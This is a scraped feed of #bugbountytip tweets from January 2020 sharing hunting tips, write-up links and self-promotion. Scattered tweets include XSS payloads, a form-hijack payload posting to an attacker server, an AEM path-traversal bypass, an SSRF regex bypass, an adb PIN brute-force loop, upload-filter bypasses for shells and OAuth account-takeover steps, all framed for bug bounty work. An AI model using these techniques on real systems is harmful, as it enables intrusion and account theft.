0 Generally people don't tweet against Chinese and Russian ...... Reason :-. They fear their mobile phones and PCs could get hacked ! #caronavirus #cornavirus #PrayForChina #hackerone #Hackers #hackathon #bugcrowd #togetherwehitharder #bugbounty #BugBountyTip
Th3Alch3mist~
@Debian_Hunter


2020-01-31 14:01:24
0 OAuth+Host Header Injection leads to Account Takeover 🤙simple yet nice tip for beginners #bugbountytip #bughunting #infosec #bugbounty https://t.co/6qItnrR9Ky
Your Next Bug Tip
@YourNextBug


2020-01-31 13:41:59
1 Steps 0) Login in with Twitter 1) Host Header Injection [to a.cxx] 2) Generate OAuth Token's Link 3) Send link to Victim, after victim authorize 4) Verifier send to a.cxx 5) Reuse use token Account Takeover by @ngalongc #bugbountytips #bugbountytip https://t.co/fstnEFS244
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-31 13:07:47
0 Bug Hunter Life 🤖✅❤️ Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/zL6mBl7w1Z
youssef
@genieyou


2020-01-31 12:20:48
2 awesome idea for you blog @filedescriptor @ngalongc @EdOverflow great article congrats https://t.co/HdMi507hh4 #BugBounty #bugbountytips #BugBountyTip
/๐’…๐’†๐’—/๐’๐’–๐’๐’ ๅฐ้ขจ
@spyerror


2020-01-31 11:32:52
4 »_ everything is not as it seems. 🎃 «input»; p=-alert(1)}//\ $result* var n = {a: "-alert(1)}//\", b: "-alert(1)}//\"}; «input»; p=\&q=-alert(1)// $result* var n = {a: "\", b: "-alert(1)}//"}; #BugBounty #BugBountyTip #WAF #infosec
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-31 10:08:16
1 Bug Bounty Life Cycle 🤖🤖 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/WQOAxWKgfW
Yadhavi
@PrincessYadhavi


2020-01-31 10:08:03
0 Do you know any labs (free or paid ) to practice new CVEs online? Except @PentesterLab and pentesteracademy #bugbountytips #bugbounty #bugbountytip
Zerorose Inc.
@zeroroseinc


2020-01-31 06:53:03
0 Ethiopian governments shadowy #bugbounty initiative to reward for bugs and exploits in popular software. I believe first of it's kind for this kind of talent recruitment in Africa. Impressive! https://t.co/Hixyo8AoXS #bugbountytips #bugbountytip
m0z
@LooseSecurity


2020-01-31 00:24:24
4 Install Python. Open yourself up to a world of open-source bug bounty tools. Don't put it off, because it will enrich your skills. #BugBounty #bugbountytips #BugBountyTip #infosec #infosecurity
ｙｏｄｈｈａ
@y0dhha


2020-01-30 23:24:58
2 HTTP Request Smuggling -Socket Poisoning https://t.co/F8AECN2aaq #bugbountytips #BugBountyTip #bugbounty #http #infosec #cybersecurity https://t.co/f3cdoy3tIH
Donato Scaramuzzo
@ramirezVII


2020-01-30 19:30:50
0 Button disabled? Inspect Element -> change from "disabled" to "enabled" -> Button enabled and action performed #BugBountyTip 💪🏻😆
Rushiikesh 🇮🇳
@u1tran00b


2020-01-30 17:56:43
0 An Interesting Account Takeover: 😃 #infosec #bugbountytips #BugBountyTip #hackerone #bugcrowd Credits: @fatratfatrat ❤️💥🤘 https://t.co/fPCoT5hV5W
AEMSecurity
@AEMSecurity


2020-01-30 16:29:18
1 [+] #BugbountyTip: When testing for anonymous write access on Adobe AEM in "/content/usergenerated/*" If you get HTTP 404, try bypassing the dispatcher filter rules like this: "/ANYEXISTINGFOLDER/..../content/usergenerated/test" #Bugbounty #TogetherWeHitHarder #AdobeAEM
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-30 16:25:24
1 Cyber Security 🤪🤖🤖🤖🤖 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/Wsmd27pcML
fuzzsqlbOf
@fuzzsqlbof


2020-01-30 15:47:29
5 read my detailed writeup on HTTP Request Smuggling which i found in pvt program https://t.co/rUevK40Ip9 #bugbountytips #togetherwehitharder #bugbounty @albinowax #hackerone #bugbountytip
Your Next Bug Tip
@YourNextBug


2020-01-30 15:31:14
0 Thanks @traceableai for providing API testing resources(tips) There aren't many info about API testing but your tips and this blog post is awesome to learn API Testing #bugbountytips #bugbountytip #bugbounty https://t.co/6gI1kS7I7A
Zerorose Inc.
@zeroroseinc


2020-01-30 14:32:55
1 Accellion SSRF to LFD by exploiting a weak regex /$http://site.com/i -- without the ^ in the front so bypassing with file:///file#http://site.com by @PaulosYibelo https://t.co/I1iJ2ZnfqH #bugbountytips #bugbounty #bugbountytip
The Bug Bounty Podcast
@bounty_podcast


2020-01-30 13:17:17
3 Episode #2 - We sit down with @0xacb to talk about how to be successful in bug bounty, live events, music and creativity and of course, how to reach cosmic brain level 10. Listen on https://t.co/eY3KgecFBv #bountylife #bugbounty #bugbountypodcast #bugbountytip #bbp
INTIGRITI
@intigriti


2020-01-30 13:06:53
49 Some #bugbounty hunters made over €50.000 in bug bounties with this simple trick. 🤑 Thanks for the #BugBountyTip, @rez0__! https://t.co/z9sPFJTNqV
Black Turtle
@thebl4ckturtle


2020-01-30 10:30:20
0 A simple tool to detect wildcard domains based on Amass's wildcards detector. https://t.co/SrZP1KwNqh P/s: @jeff_foley Thanks for creating an awesome tool! #bugbounty #golang #bugbountytip #bugbountytips
Andy Garcia
@GaelleTjat


2020-01-30 06:45:34
0 A Webshell story https://t.co/pOHt81i6dZ #bugbountytip @Hacker0x01 @Jhaddix #infosec
Robr
@sweepthatleg


2020-01-30 00:21:43
0 Always a fan of @LittleJoeTables creations. This time ⚡ fast screen shots in a convenient desktop app #bugbounty #bugbountytip #infosec #electron #javascript https://t.co/k9ae1Yk8Zq
z3rb0a
@OwlCyberGhost1


2020-01-30 00:14:41
0 My first race condition. They did not view it as a serious security risk, but rewarded me in appreciation #bugbounty #bugbountytip #hackerone #TogetherWeHitHarder https://t.co/UeArHgwfWr
Andri Wahyudi 🕊️
@andripwn


2020-01-29 20:30:25
1 Wordpress: Multiple Vulnerabilities in Simple Login Log Plugin https://t.co/gZdRnaJYdY #bugbountytip #bugbountytips #wordpress #vulnerability
Samet SAHIN
@sametsahinnet


2020-01-29 19:28:57
2 If you have a XSS in a <form> tag, close it and open a new form that you are controlling. Payload : "></form><form action="http://yourserver/> This is just a short payload for increasing the severity. #bugbountytip #bugbountytips https://t.co/140rJjo5Nt
Abhijeet Singh
@abhiunix


2020-01-29 16:15:03
0 My first bounty, after 25+ dups and 2 N/As. Got Hall of Fame in few programs but never get paid. Thanks to all members of bug bounty community. @Hacker0x01 A special Thanks to @OffensiveHunter Sir & @abhinavbom Sir for the guidance. #bugbounty #bugbountytip #TogetherWeHitHarder https://t.co/kKQQZ84Bba
Lütfü Mert Ceylan
@lutfumertceylan


2020-01-29 12:04:44
0 An exploit, 240+ affected site (Reflected XSS) @openbugbounty #BugBounty #bugbountytip https://t.co/Rp6SFcEOVY
Ujwal Kumar
@Ujwal07kumar


2020-01-29 08:01:22
1 https://t.co/mzK8B5B2zR Have written a blog on Bug bounty with Google recon. Contains list of dorks to check for juicy contents. Recommended to developers and security folks. #security #dataprivacy #bugbounty #bugbountytip Any suggestions are welcome. :)
Harsh Jaiswal
@rootxharsh


2020-01-29 02:45:10
1 One more: Find a subdomain such as <grafana>.corp.company.com which points to a external IP example however only accessible inside VPN and such SSRF could be leveraged in that way. You can often find such hosts over SSL. Have exploited such in pasts. Might even be a #bugbountytip https://t.co/lusB0fAEnU https://t.co/BVA99w6ios
Zerorose Inc.
@zeroroseinc


2020-01-28 22:15:59
2 Yahoo homepage strightfwd XSS by @PaulosYibelo from end of 2019. https://t.co/Il48kikn29 #bugbounty #bugbountytip
d4d
@d4d89704243


2020-01-28 20:36:48
0 I was able to successfully exploit the vulnerabilities in PHP parse_url from @orange_8361 article of 2017 https://t.co/jCdIuhFtz0 and found new way to exploit curl uri parser #bugbountytip
Ammar Amer🇸🇾
@cry__pto


2020-01-28 18:54:08
5 #OSINT DomainTools:https://t.co/zFCGR0Un8G Active Whois:https://t.co/KtnxHQevyp Domain Dossier:https://t.co/hjdz9aNJuW Network Solutions:https://t.co/rZhFIOmJVZ DNSstuff:https://t.co/C5T85kfbOB DNS-Digger:https://t.co/FWwXrCvNdm Shodan:https://t.co/U8xoj0R4dN #bugbountytip
Aish Kendle
@aish_kendle


2020-01-28 18:24:49
0 Got my first Subdomain Takeover! #ReconWins #bugbountytips #bugbounty #s3 #aws #azure #bounty #bug #bughunting #infosec #reward #bugbountytip #first #recon #cybersecurity #infosec #cyberattack #hacking https://t.co/07eVXqCIWS
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-28 10:24:17
1 Hackers Say Yo ! 🤖🤖 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/vheJORritR
Abhishek 🕵️
@abhishake100


2020-01-28 09:49:36
0 I just published "Hyperlink Injection - Easy Money (sometimes)" #bugbounty #bug #bounty #bugbountytip https://t.co/zLbLOZraqX
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-28 09:23:49
2 Online Privacy is a MYTH ! 🤖🤖🤖 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/pFsxZWkByp
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-28 09:20:31
4 Life of Cyber Security Professionals 🤖🤖🤖 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/5mjA2uBFTJ
x1m
@x1m_martijn


2020-01-28 09:08:24
0 Clean desk, clean mind 😌☺️ #infosec #bugbountytip https://t.co/Q8YxsF6cr6
Th3Alch3mist~
@Debian_Hunter


2020-01-28 07:32:17
0 Sweet as candy 🍬 nice tip #bugbountytip #infosec https://t.co/uWJAWNJpv9
Hx01
@Hxzeroone


2020-01-28 06:47:12
0 @Kr0t3 I’d suggest creating a twitter bot which fetches tips with hashtags like #bugbountytip
Mashoud1122
@mashoud1122


2020-01-27 18:01:55
2 There are some endpoints show JSON, but forget to set the header to “Content-type: application/json” and leave it as “Content-type: text/html” , and they show special chars , easy XSS ;) #bugbountytip #bugbountytips #BugBounty
o k t a v a n d i
@0ktavandi


2020-01-27 11:49:23
0 Never trust a public cheatsheet , cheatsheet is just a reference for purpose development , make your own cheatsheet #protip #bugbountytips #bugbountytip
bug bounty tips - Retweet
@YourNextBug


2020-01-27 10:20:59
2 Send Any Message From Snapchat to anyone. Snapchat Hacked By: Mohammad Khizer Javed https://t.co/LnkvBjqndu #bugbountytips #bugbountytip #bugbounty
M. Khizer Javed
@KHIZER_JAVED47


2020-01-27 08:57:21
0 Instant Admin Access!! #Takeaways always check JS files and request responses. This tool by @jobertabma is pretty good in looking for endpoints https://t.co/1iTFImCerY #BugBounty #bugbountytips #bugbountytip
Tomi
@noobe_io


2020-01-27 06:33:24
0 Start this week with Authentication Bypass XD #BugBounty #bugcrowd #bugbountytip https://t.co/kh7QfZoECi
Himanshu Giri
@Himanshuraj17Hr


2020-01-27 06:18:18
2 If there is no rate limit on PIN functionality of Android APK ,but the app is protected by every mechanism, then try to brute Force using adb . for i in {0000..9999}; do adb shell input text $i ; done #BugBounty #BugBountyTip #bugbounties #bugbountytips #600$
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-27 04:35:18
0 #RDP #HACKING Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/FoMZwetU8T
human
@t0ddpar0dy


2020-01-26 23:13:03
0 Show. Me. Your. Vuln Face! You know—the face you make when you’ve found the unthinkable.. #BugBountyTip #BugBounty #hackers
m0z
@LooseSecurity


2020-01-26 18:57:33
0 For enumerating subdomains I always use @zer0pwn's Spyse API wrapper. It's so f'in good! https://t.co/zBAsuiKw7c #bugbountytips #bugbountytip #bugbounties #bugbounty #infosec
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-26 17:22:52
3 #redteam Security Assessments Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone #follow https://t.co/CGKg7E7EiX
Maximiliano Soler
@MaxiSoler


2020-01-25 22:48:09
1 It has been a blast! Seeing the local community sharing and helping each other. Kudos @ylevalle @soyelmago and @Hacker0x01 Crew @Arl_rose & @sgtcardigan 🇦🇷 #BugBountyTip #togetherwehitharder 💪🏾 https://t.co/xj6RDkiLiL
Ammar Amer🇸🇾
@cry__pto


2020-01-25 22:41:08
8 -PENTESTING-BIBLE: https://t.co/q2layzVpKz -OSINT_TIPS: https://t.co/gNMSDGULS6 #BugBountyTip #Hacking #pentest #OSINT #redteam #Malware #CyberSecurity #Linux #html5 #computerscience #infosec #Python
Junaid Khan
@akajunoon


2020-01-25 18:59:05
0 Last Two Months was so surprising for me ... Demanded infinite help from other to learn Bug Hunting but sadly one thing i learned ... They will help you until and unless you have something giving them back . #bugbountytips #hackerone #BugBountyTip #hackers
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-25 17:41:59
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/FmFBqH5ihS
noobSecurity
@noobsec_org


2020-01-25 16:07:26
2 Always view the page source code, sometime u get some GOLD like mdfk this 💰💰💰💰💰 P1 just in 5 minutes #bugbountytips #bugbountytip #OuthackThemAll #ItTakesACrowd #togetherwehitharder https://t.co/eFXvbt5abw
Katie Paxton-Fear
@InsiderPhD


2020-01-25 16:00:01
11 🚨New video! This week we talk about CSRF bugs, definitely one of the more technical beginner bugs, but actually not that difficult once you get your head around them. Case studies as usual but also some PoC code + a demo #BugBounty #bugbountytip https://t.co/zUxcUwLts9 https://t.co/Ia75ItLYDj
Sayaan Alam
@ehsayaan


2020-01-25 13:16:05
1 Just did a write-up on my recent finding. #bugbountytip #writeup #bugbounty “Accidental IDOR that Deleted Admin Account.” by Sayaan Alam https://t.co/LURpTYicyi
Imran Parray
@CreedHackers


2020-01-25 12:50:53
2 #bugbountytip Mastering a single bug class is better than being noob at everything. #bugbounty #infosec
Hussein Daher
@HusseiN98D


2020-01-25 12:28:21
2 #BugBountyTip time: combine Arjun from @s0md3v with Burp Intruder to bruteforce parameter values. I once got "?debug" as a valid parameter and got "on" as a good value which disclosed juicy information helping me chain bugs to a P1. Final: "?debug=on" #bugbountytips #pentest RT & L
Leonishan
@leonishan_


2020-01-25 11:12:49
3 Detecting valid tags/events on XSS exploitation. A script to find suitable XSS payloads after analyzing how tags/events are filtered. https://t.co/u6WxTL5gBe https://t.co/n9zMuRW8gX #XSS #bugbountytip #bugbounty
Th3Alch3mist~
@Debian_Hunter


2020-01-25 10:28:39
0 I Found this tool while recon and let me tell you something "IT'S AWESOME!! " xd check this out it collects many information automatically using different tools so you must run it if you are starting a new program #bugbountytip #bugbounty #bugbountytool https://t.co/M2FUBHycMM
Sayaan Alam
@ehsayaan


2020-01-25 09:00:00
0 Good Opportunity to protect your country.. #bugbountytip https://t.co/xcTrdnlM7r
reconness
@reconness


2020-01-25 00:57:13
0 Remember you can join us in our Discord Server https://t.co/LIWdtvdJmT #bugbountytip #Pentesting #recon
M. Khizer Javed
@KHIZER_JAVED47


2020-01-24 18:12:20
1 #BugBountyTip While looking in github for information desc do check commit history sometimes they remove the tokens but don't change or revoke them ;) https://t.co/r05vUKKkuX
bug bounty tips - Retweet
@YourNextBug


2020-01-24 16:34:38
0 Read Any File using .odc file Hacked By @pnig0s Read Here https://t.co/lpqCZYApLX #bugbountytips #bugbountytip
thehackerish
@thehackerish


2020-01-24 07:13:36
0 I remember when I saw Sqlmap the first time mentioned in @rootme_org, I was exploiting #SQL injections manually or via Python scripts, then fell in love with how effective Sqlmap was. #BugBountyTip: It is a must have tool to master, follow @sqlmap for advanced usage.
bug bounty tips - Retweet
@YourNextBug


2020-01-24 02:31:48
1 Found a b-sqli Status-same Cont. Length - Same Visible Content Same Looking at source code found that right query adds a <div></div> false query remove the <div></div> But No change in content length, probably it was adding something else. #bugbountytips #bugbountytip
ｙｏｄｈｈａ
@y0dhha


2020-01-23 22:46:52
2 1) skf-labs :> Repo for all the OWASP-SKF Docker lab examples https://t.co/7cIL06hS9Y #) KernelMalware https://t.co/1HrR6S7LWx #bugbounty #bugbountytips #BugBountyTip #kernel #malware
ｙｏｄｈｈａ
@y0dhha


2020-01-23 22:43:50
0 1) New Muhstik Botnet Attacks Target Tomato Routers https://t.co/AHgAbfr8CE 2) AlertResponder - Automatic Security Alert Response Framework By AWS Serverless Application Model https://t.co/aVNdKucwHG #bugbounty #bugbountytips #BugBountyTip
Virus
@Virus0X01


2020-01-23 21:16:15
0 read my write up about CORS i found in a private program #bugbounty #BugBountyTip https://t.co/tLvlcrf7SO
0xNoah
@ncnx700


2020-01-23 20:46:49
1 I want to get my blog set up. I'm interested in what people think the best platform or method of going about it is. I'm willing to manually set up and configure one if I choose to host it myself. Please retweet for visibility! #infosec #CyberSecurity #OSINT #H1 #BugBountyTip
terjanq
@terjanq


2020-01-23 16:31:52
5 I started writing solutions to my challenges on #justctf quite a time ago but haven't had enough time to finish it. I decided to publish these very chaotic writeups to Dominoes, Scam Generator and p&q service. #xssearch #bugbountytip https://t.co/eImStmRiuT
Damian Schwyrz
@damian_89_


2020-01-23 15:39:16
0 Nice, found an older adminer version on a host which allows using "Elasticsearch (beta)" as a source and it turns out, we can abuse this. At least blind ssrf ;) #bugbountytip https://t.co/rj59BI1SHv
Hendrik
@hendrikvb


2020-01-23 14:14:50
0 Asking for a friend: #ethicalhacking means you *should not* abuse a sequential recipient ID in a spam newsletter “View Online” link and click unsubscribe for all victims.. right? #BugBountyTip #spam
Eduard Tolosa
@Edu4rdSHL


2020-01-23 12:30:17
5 Bash function to check domain wildcards. Add it to your .bashrc and use it with: check_wilcard domain.example #bugbounty #bugbountytips #bugbountytip #bash #linux https://t.co/Sa1z4u8Lfy
Jenish
@_jensec


2020-01-23 08:24:43
13 2nd critical of this week. #BugBountyTip Abuse OAuth sign-up flow: 1) Use phone number instead of email in 3rd party to sign up. 2) Link victim's email to your 3rd party account while signing up on target. 3) Login to victim's account using your 3rd party account. https://t.co/4yrK5KXa4v
SPAWN POINT GAMING
@gametestingsp


2020-01-23 06:58:07
0 A #game plagued by #Bugs/#Glitches is the worst nightmare for #GameDevelopers! So what are bugs and their types in a game? Click here to read this #BLOG 👉🎮 https://t.co/y5BiX492wh #Gamedev #BugBountyTip #Indiedev #MobileGame #Androidgames #readers #article #gamingblog #unity
GokhanGK
@gkhck_


2020-01-23 06:55:02
1 Atlassian Confluence 3.4.x - Error Page Cross-Site Scripting Payload : %3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm CVE-2018-5230 https://t.co/Ulv9nwcnQv #bugbountytip #bugbountytips https://t.co/nXx2Xiu4jQ
Jerry @unitedconindia
@lordjerry0x01


2020-01-23 05:12:08
0 You may find this useful 😉 #BugBountyTip #bugbounty #hacking https://t.co/wWk7EwV7zS
Nassec.io
@nassecio


2020-01-23 03:30:51
8 @evilboyajay comes up with another #bugbountywriteup on this week's blog - this time about Host-Header Injection. #informationsecurity #cybersecurity #bugbounty #infosecmatters #writeups #hostheaderinjection #bugbountytip https://t.co/E7hXZo0XaV
Th3Alch3mist~
@Debian_Hunter


2020-01-23 03:11:35
0 Check this out it's cool #bugbountytips #bugbounty #BugBountyTip https://t.co/49rkPVwoDQ
Hussein Daher
@HusseiN98D


2020-01-22 23:06:21
18 #BugBountyTip time: I've got a RCE by using this tip: while testing for malicious file uploads, if .php extension is blacklisted you can try .PhP , .php5 and .php3 Sometimes this fools the backend and you get shell! RTs & comments are appreciated. Follow #bugbountytips #pentest
ｙｏｄｈｈａ
@y0dhha


2020-01-22 22:01:22
1 Bugbounty Checklist By Sehno https://t.co/wshOrucUjT #bugbounty #BugBountyTip #bugbounty2020goals #bigbountytips #infosec #security #nullcrowd https://t.co/0FoTN4pcEf
bug bounty tips - Retweet
@YourNextBug


2020-01-22 18:02:41
2 One can drive a bike at 80km/hr and someone can drive the same bike at 120 km/hr. Its matter of knowing the tool and practicing it. BLOG ON SHODAN Using Shodan Better Way by @0xrudrapratap https://t.co/HUrxeMQM94 #bugbountytips #bugbountytip
Rafin Rahman Chy
@rafinrahmanchy


2020-01-22 17:56:27
0 Guides for Business Logic Flaw https://t.co/chT0dwJAee https://t.co/RnwFmNfdwj https://t.co/t9aNa8GVOe #BugBounty #bugbountytip #bugbountytips #websecurity #appsec #netsec #pentesting #pentest #EthicalHacking #EthicalHacker #Hacking #Hacker #InfoSec #InfoSecurity #CyberSecurity
bugbountymemes
@bugbounty_memes


2020-01-22 16:27:28
0 #bugbountytip when report closed as duplicate 😀😀 https://t.co/p7IrtWLPED
Cryptographer
@crypt0gr4ph3r


2020-01-22 16:24:27
3 Awarded $100 bounty on @Hacker0x01 in less than 1 minute 1. Reported bug and got duplicate :( 2. Added in original report 3. Waited for fixed. Before :- x(.)com/abc/payload 3. Bypassed fix :- Just changed to :- x(.)com/abC/payload #bugbounty #bugbountytip #hackerone
bug bounty tips - Retweet
@YourNextBug


2020-01-22 15:19:25
2 Just Like Second order sqli and xss, Here is Second order IDOR. MUST CHECK OUT #bugbountytips #bugbountytip #bugbounty https://t.co/wWdvIjNBOt
Eduard Tolosa
@Edu4rdSHL


2020-01-22 14:29:12
1 Second part of “Subdomains Enumeration: what is, how to do it, monitoring automation using webhooks and centralizing your findings” is coming soon. Follow me to be aware. First part quoted. #BugBounty #bugbountytip #recon #hacking #osint #findomain #bugbountytips #webhooks https://t.co/SHKFdYiq2K
Ankit(Rudra16)
@rudra16t


2020-01-22 12:20:55
2 Watch our expert @fransrosen keynote from @bsidesahmedabad #infosec #bugbounty #BugBountyTip https://t.co/KL8BybPIaV
BSides Ahmedabad
@bsidesahmedabad


2020-01-22 12:17:04
8 Watch @fransrosen Keynote at #bsidesahmedabad2019 https://t.co/hcJkB3r3po #BugBountyTip #bugbounty #KeynoteSpeaker #infosec #Pentesting #hacking #Hacked
Ismayil Tahmazov
@Tismayil1


2020-01-22 11:30:41
2 @AsrcSecurity thanks for gifts. #bugbounty #bugbountytips #BugBountyTip #bugbounty2020goals https://t.co/0jn1CUTjEH
Yadhavi
@PrincessYadhavi


2020-01-22 08:35:53
0 anyone know golang version of whatweb tool? #bugbounty #bugbountytip #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-22 08:28:47
3 Connected Cars #hacking 👇👇👇👇👇👇 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/hE4MdPWXNu
Hussein Daher
@HusseiN98D


2020-01-21 22:34:45
17 #BugBountyTip time: when you see a POST request made with JSON, convert this to XML and test for XXE. You can use "Content-type converter" extension on @Burp_Suite to achieve this! #bugbountytips #infosec #hacking #pentest #pentesting #bugbounty RT and Follow, book coming!
ｙｏｄｈｈａ
@y0dhha


2020-01-21 21:32:55
0 Awesome GitHub Repos 9. Awesome Web Security = https://t.co/JYwoh7QCdy 10. Penetration Test Guide based on OWASP = https://t.co/6YKTRRvvTZ 11. Pentest Compilation = https://t.co/fbpKJXGnWI 12. Infosec Reference = https://t.co/KSGiX8Vv1D #bugbountytips #bugbountytip #hacking https://t.co/j75f0AfTpa
ｙｏｄｈｈａ
@y0dhha


2020-01-21 21:32:15
0 Awesome GitHub Repos 5. Awesome Web Hacking = https://t.co/tS4wYzEZ4v 6. Awesome Hacking Resources = https://t.co/i6d4C1OIzN 7. Awesome Pentest = https://t.co/eZ5mDtUi3a 8. Awesome Red Teaming = https://t.co/zu17ZEK16J #bugbountytips #bugbountytip https://t.co/FfNJ4D2imR
ｙｏｄｈｈａ
@y0dhha


2020-01-21 21:31:30
0 Awesome GitHub Repos 1. Book of Secret Knowledge = https://t.co/kLqcHAo7gV 2. Awesome Hacking = https://t.co/vRBXZkxI29 3. Awesome Bug Bounty = https://t.co/lMh6dqBGN1 4. Awesome Penetration Testing = https://t.co/9cDaJLVKGm #bugbountytips #bugbountytip #hacking https://t.co/yCTNbsHWcr
Kenan
@kenanistaken


2020-01-21 20:39:11
1 newbies ask,where to start,what to learn. start at home,start at work,start whereever you want,just start. learn whatever you want. no need to ask these questions anymore anybody. I'm here because I am experienced computers since 90s. you still ask where to start 😂 #bugbountytip
bug bounty tips - Retweet
@YourNextBug


2020-01-21 18:12:29
0 What was your worst bug bounty mistake? #bugbounty #bugbountytips #bugbountytip
healthyoutlet
@healthyoutlet


2020-01-21 17:06:44
0 When devs are nice enough to leave an accessible sourcemap, use this tool to download everything so you don't have to analyze the code in your browsers debugger: https://t.co/bS6dJmXkOY #bugbountytip
bug bounty tips - Retweet
@YourNextBug


2020-01-21 16:47:15
0 What was your worst bug bounty mistake? Mine was reporting SQL database username and password leak to an out of scope domain, report got not valid and -ve points, although they fixed that. -_- #bugbounty #bugbountytips #bugbountytip
Eduard Tolosa
@Edu4rdSHL


2020-01-21 14:25:59
2 `sudo -l` gives you a list of allowed and forbidden commands for the current user. It's useful because sometimes people allow certain (dangerous) commands without using password, so you can do a local privilege escalation. #linux #bugbountytip #BugBounty
OWASP Web Security Testing Guide
@owasp_wstg


2020-01-21 11:46:01
0 Without a strong lockout mechanism, the application may be susceptible to brute force attacks. 🤜🚪 Use combinations of incorrect password attempts and correct login credentials to test lockout mechanism rules. #cybersecurity #bugbountytip #appsec https://t.co/lWVLEqWX0Z
ｙｏｄｈｈａ
@y0dhha


2020-01-21 10:54:00
0 - Hey folks <3 Here is a "OSINT , Capture the flag" challenge :) This is a mixture of OSINT & steganography challenge ♥️ Attachment: https://t.co/61DLQoCROi Password - nullcrowd #ctf #ctfchallenge #bugbountytips #bugbountytip #bugbounty2020goals https://t.co/0EAqyPy3Ln
thehackerish
@thehackerish


2020-01-21 09:59:30
0 When looking on known exploits for a target, Twitter can help you: search "target #bugbountytip". The #BugBounty community can surprise you sometimes with cool tricks!
ηαe⁷
@chocolatey_tae


2020-01-21 09:28:31
2 Hey guys , Every Hacker should join this platform ASAP it's damn cool . https://t.co/kH0TUTWYJW #hacker #BugBounty #bugbountytip
Cipher_942
@Ciper_942


2020-01-21 09:26:52
0 Hey guys , Every Hacker should join this platform ASAP it's damn cool . https://t.co/xZYf0qZTkd #hacker #BugBounty #bugbountytip
niravsikotaria
@niravsikotaria


2020-01-21 03:09:04
5 Challenge Link: https://t.co/8y1ld1iXkq Parameter: ruid Bug Type: Expression Language Injection Send POC in PM. @gabsmashh @stokfredrik #hacking #pentesting #infosec #bug #bugbounty #hackerone #bugbountytip #bugbountytips
Aashish Yadav
@aa5h15h


2020-01-20 20:21:18
4 First Steps in Hyper-V Research https://t.co/oM3FgO4A2e #research #infosec #cybersecurity #pentest #redteam #exploit #hackerone #hyperv #bugbounty #malware #virtualization #oracle #virtualbox #bugbountytip #windows #linux #unix #dev #bugcrowd #RETWEEET #programming https://t.co/vOEH9qiR6E
Hussein Daher
@HusseiN98D


2020-01-20 20:07:28
16 Time for a new #bugbounty tip! When I sign up to a website/newsletter/reset password, I look at the website which hosts the logo/image in the email I receive. This led me multiple times to insecure AWS S3 buckets and scope expansion. #bugbountytip #bugbountytips #infosec #hacking
bug bounty tips - Retweet
@BugbountytipsR


2020-01-20 16:32:50
0 I have been reading diff API testing related article but didn't find any direct/satisfied article that can dive me in deep. It will be really gr8 if you guys can share some article/presentation/video or your own tip :) #bugbountytips #bugbountytip (1/2)
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2020-01-20 14:02:48
0 Follow Us 💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/8hvsLmZL9C
